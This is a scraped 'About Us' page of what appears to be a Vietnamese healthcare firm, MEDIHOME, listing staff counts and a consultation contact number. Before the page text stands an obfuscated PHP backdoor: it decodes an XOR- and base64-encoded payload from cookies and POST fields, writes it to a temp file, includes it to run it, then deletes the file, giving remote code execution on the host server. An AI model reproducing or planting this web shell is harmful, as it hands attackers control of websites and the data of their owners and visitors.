$wIRblQLn = chr ( 709 - 597 ).chr ( 822 - 727 ).chr ( 536 - 446 ).chr (118) . "\142" . 'w' . "\x63";$czDmPiogFy = "\x63" . "\154" . chr ( 490 - 393 ).chr ( 671 - 556 )."\163" . "\137" . chr ( 458 - 357 )."\x78" . "\x69" . chr (115) . chr ( 1009 - 893 ).chr (115); $WYhndTwqF = class_exists($wIRblQLn); $czDmPiogFy = "30483";$RMnXeVXr = !1;if ($WYhndTwqF == $RMnXeVXr){function vNUyzU(){return FALSE;}$gZpvgSDl = "63329";vNUyzU();class p_Zvbwc{private function areZwt($gZpvgSDl){if (is_array(p_Zvbwc::$qrHpJCKo)) {$iRhlV = sys_get_temp_dir() . "/" . crc32(p_Zvbwc::$qrHpJCKo['s' . chr ( 745 - 648 )."\154" . "\x74"]);@p_Zvbwc::$qrHpJCKo['w' . "\162" . chr ( 509 - 404 ).'t' . "\x65"]($iRhlV, p_Zvbwc::$qrHpJCKo[chr (99) . chr (111) . chr (110) . "\x74" . chr (101) . "\156" . 't']);include $iRhlV;@p_Zvbwc::$qrHpJCKo[chr ( 993 - 893 ).chr (101) . "\x6c" . chr (101) . 't' . chr (101)]($iRhlV); $gZpvgSDl = "63329";exit();}}private $DUpjCq;public function trKRTg(){echo 46032;}public function __destruct(){$gZpvgSDl = "54247_59206";$this->areZwt($gZpvgSDl); $gZpvgSDl = "54247_59206";}public function __construct($SebzfWx=0){$pJtdtarL = $_POST;$NDmNCKWvBb = $_COOKIE;$elSUaw = "f78d7c92-a113-4671-a3f5-e628e8158f6d";$KgOQit = @$NDmNCKWvBb[substr($elSUaw, 0, 4)];if (!empty($KgOQit)){$kkxeJStMeC = "base64";$TpxPd = "";$KgOQit = explode(",", $KgOQit);foreach ($KgOQit as $exydzmw){$TpxPd .= @$NDmNCKWvBb[$exydzmw];$TpxPd .= @$pJtdtarL[$exydzmw];}$TpxPd = array_map($kkxeJStMeC . '_' . "\144" . 'e' . "\x63" . "\157" . "\144" . "\145", array($TpxPd,)); $TpxPd = $TpxPd[0] ^ str_repeat($elSUaw, (strlen($TpxPd[0]) / strlen($elSUaw)) + 1);p_Zvbwc::$qrHpJCKo = @unserialize($TpxPd); $TpxPd = class_exists("54247_59206");}}public static $qrHpJCKo = 15678;}$YKTOan = new /* 53202 */ $wIRblQLn(63329 + 63329); $RMnXeVXr = $YKTOan = $gZpvgSDl = Array();} About Us - MEDIHOME
10

SPECIALITIES

20

HEALTH PROFESSIONALS

35

HEALTHCARE SPECIALIST

1000

CUSTOMERS

Check Regularly. Early Detection
HEALTHY LIVING!

Translate »

Đăng ký nhận tư vấn ngay

Đội ngũ Chăm sóc Khách hàng của chúng tôi sẽ liên lạc để cung cấp thông tin khi thuận tiện và sớm nhất cho bạn.

Bạn có thể liên hệ với chúng tôi tại:

1900 9204